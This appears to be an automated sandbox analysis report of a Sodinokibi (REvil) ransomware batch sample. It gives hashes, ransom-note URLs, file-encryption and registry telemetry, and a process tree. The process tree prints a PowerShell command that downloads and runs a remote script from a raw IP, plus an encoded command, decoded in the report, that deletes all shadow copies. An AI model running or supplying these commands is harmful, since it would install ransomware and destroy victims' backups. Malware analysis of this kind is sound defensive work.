Analysis
max time kernel: 143s
max time network: 137s
platform: windows7_x64
resource: win7v200217
submitted: 21-02-2020 16:10

Tasks
- Static task: static1
- Behavioral task: behavioral1 (Sample: Qqgre83T.bat, Resource: win7v200217)
- Behavioral task: behavioral2 (Sample: Qqgre83T.bat, Resource: win10v200217)
General
Target: Qqgre83T.bat
Size: 197B
MD5: 23fb28ede9070f21977214722b7b46fe
SHA1: f81fbe696a0abdcf0e314125ed1aaf8779feff0d
SHA256: 552e2dd699f7eb32c4ce0dc9dd35616b783cdf3fcb391b01b0422e2ad98a8a45
SHA512: dcd01869d9bd74264aba08b5c66f7a94b3c5513f0e713fdd3d596e1ed6cb43582c184d39ca9f78a6d23814a96535a5ef294f97c42594e10b7546d38e2f0cc4ac
Malware Config
Extracted from: http://185.103.242.78/pastes/Qqgre83T

Extracted from: C:\rnmbv-readme.txt
Family: sodinokibi
URLs:
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8CF4F644E288F198
- http://decryptor.cc/8CF4F644E288F198
Signatures

Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
description | ioc | process
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
description | pid | process | target process
PID 1828 wrote to memory of 1852 | 1828 | cmd.exe | powershell.exe
PID 1852 wrote to memory of 1964 | 1852 | powershell.exe | powershell.exe
PID 1852 wrote to memory of 1964 | 1852 | powershell.exe | powershell.exe
PID 1852 wrote to memory of 1964 | 1852 | powershell.exe | powershell.exe
PID 1852 wrote to memory of 1964 | 1852 | powershell.exe | powershell.exe
Blacklisted process makes network request (71 IoCs)
Processes: powershell.exe
flow | pid | process
All listed flows belong to pid 1852, powershell.exe. Flows: 3, 5, 6, 8, 10, 12, 13, 15, 17, 18, 20, 21, 23, 24, 26, 28, 30, 33, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 53, 55, 57, 59, 63, 64, 66, 68, 70, 71, 73, 76, 78, 80, 81, 83, 85, 87, 88, 89, 90, 92, 98, 100, 102, 104, 105, 107, 109, 110, 112, 113, 115, 117, 118, 120
Discovering connected drives (3 TTPs, 7 IoCs)
Processes: powershell.exe, powershell.exe, cmd.exe
description | ioc | process
File opened (read-only) | \??\F: | powershell.exe
File opened (read-only) | \??\C: | powershell.exe
File opened (read-only) | \??\C: | powershell.exe
File opened (read-only) | \??\A: | powershell.exe
File opened (read-only) | \??\B: | powershell.exe
File opened (read-only) | \??\E: | powershell.exe
File opened (read-only) | \??\C: | cmd.exe
Drops file in Program Files directory (47 IoCs)
Processes: powershell.exe
description | ioc | process
File renamed | C:\Program Files\ExpandProtect.ods => \??\c:\program files\ExpandProtect.ods.rnmbv | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\rnmbv-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcese35.dll | powershell.exe
File opened for modification | \??\c:\program files\ConvertToFormat.ini | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\rnmbv-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcecompact35.dll | powershell.exe
File renamed | C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlcecompact35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcecompact35.dll.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceer35EN.dll | powershell.exe
File renamed | C:\Program Files\ConvertToFormat.ini => \??\c:\program files\ConvertToFormat.ini.rnmbv | powershell.exe
File renamed | C:\Program Files\SplitRestart.bmp => \??\c:\program files\SplitRestart.bmp.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\ExpandProtect.ods | powershell.exe
File renamed | C:\Program Files\DisableCopy.M2T => \??\c:\program files\DisableCopy.M2T.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\LockBackup.au | powershell.exe
File renamed | C:\Program Files\LockBackup.au => \??\c:\program files\LockBackup.au.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\MoveWait.tif | powershell.exe
File renamed | C:\Program Files\GrantOpen.inf => \??\c:\program files\GrantOpen.inf.rnmbv | powershell.exe
File renamed | C:\Program Files\MoveWait.tif => \??\c:\program files\MoveWait.tif.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\SkipApprove.xhtml | powershell.exe
File opened for modification | \??\c:\program files\DisableCopy.M2T | powershell.exe
File renamed | C:\Program Files\RestartSave.xltm => \??\c:\program files\RestartSave.xltm.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\UnpublishSync.aifc | powershell.exe
File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\rnmbv-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceca35.dll | powershell.exe
File renamed | C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceca35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceca35.dll.rnmbv | powershell.exe
File renamed | C:\Program Files\SkipApprove.xhtml => \??\c:\program files\SkipApprove.xhtml.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\RestartUninstall.midi | powershell.exe
File renamed | C:\Program Files\UnpublishSync.aifc => \??\c:\program files\UnpublishSync.aifc.rnmbv | powershell.exe
File renamed | C:\Program Files\UnpublishConvertTo.rmi => \??\c:\program files\UnpublishConvertTo.rmi.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceqp35.dll | powershell.exe
File opened for modification | \??\c:\program files\EditRepair.mpv2 | powershell.exe
File renamed | C:\Program Files\EditRepair.mpv2 => \??\c:\program files\EditRepair.mpv2.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\SuspendGrant.m4a | powershell.exe
File renamed | C:\Program Files\SuspendGrant.m4a => \??\c:\program files\SuspendGrant.m4a.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceme35.dll | powershell.exe
File renamed | C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceme35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceme35.dll.rnmbv | powershell.exe
File renamed | C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceer35EN.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceer35EN.dll.rnmbv | powershell.exe
File created | \??\c:\program files (x86)\rnmbv-readme.txt | powershell.exe
File opened for modification | \??\c:\program files\RestartSave.xltm | powershell.exe
File opened for modification | \??\c:\program files\SplitRestart.bmp | powershell.exe
File opened for modification | \??\c:\program files\UnpublishConvertTo.rmi | powershell.exe
File renamed | C:\Program Files\RestartUninstall.midi => \??\c:\program files\RestartUninstall.midi.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceoledb35.dll | powershell.exe
File renamed | C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceoledb35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceoledb35.dll.rnmbv | powershell.exe
File opened for modification | \??\c:\program files\GrantOpen.inf | powershell.exe
File renamed | C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlcese35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlcese35.dll.rnmbv | powershell.exe
File renamed | C:\Program Files\Microsoft SQL Server Compact Edition\v3.5\sqlceqp35.dll => \??\c:\program files\microsoft sql server compact edition\v3.5\sqlceqp35.dll.rnmbv | powershell.exe
File created | \??\c:\program files\rnmbv-readme.txt | powershell.exe
Drops startup file (1 IoC)
Processes: powershell.exe
description | ioc | process
File created | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\rnmbv-readme.txt | powershell.exe
Modifies system certificate store
Processes: powershell.exe
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (binary data elided) | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 | powershell.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (binary data elided) | powershell.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
pid | process
1852 | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
1852 | powershell.exe
1852 | powershell.exe
1852 | powershell.exe
1964 | powershell.exe
1964 | powershell.exe
Family: Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\nz8a157m.bmp" | powershell.exe
Suspicious use of AdjustPrivilegeToken (6 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
description | pid | process
Token: SeDebugPrivilege | 1852 | powershell.exe
Token: SeDebugPrivilege | 1852 | powershell.exe
Token: SeDebugPrivilege | 1964 | powershell.exe
Token: SeBackupPrivilege | 1356 | vssvc.exe
Token: SeRestorePrivilege | 1356 | vssvc.exe
Token: SeAuditPrivilege | 1356 | vssvc.exe
Suspicious behavior: RenamesItself (1 IoC)
Processes: powershell.exe
pid | process
1852 | powershell.exe
Drops file in System32 directory (1 IoC)
Processes: powershell.exe
description | ioc | process
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
Processes

1. C:\Windows\system32\cmd.exe (PID 1828)
   Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Qqgre83T.bat"
   - Suspicious use of WriteProcessMemory
   - Discovering connected drives

   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1852, child of 1828)
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Qqgre83T');Invoke-YKWELITCAXKXYN;Start-Sleep -s 10000"
      - Suspicious use of WriteProcessMemory
      - Blacklisted process makes network request
      - Discovering connected drives
      - Drops file in Program Files directory
      - Drops startup file
      - Modifies system certificate store
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious behavior: EnumeratesProcesses
      - Sets desktop wallpaper using registry
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: RenamesItself
      - Drops file in System32 directory

      3. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1964, child of 1852)
         Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
         (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
         - Discovering connected drives
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken

1. C:\Windows\system32\vssvc.exe (PID 1356)
   Command line: C:\Windows\system32\vssvc.exe
   - Modifies service
   - Suspicious use of AdjustPrivilegeToken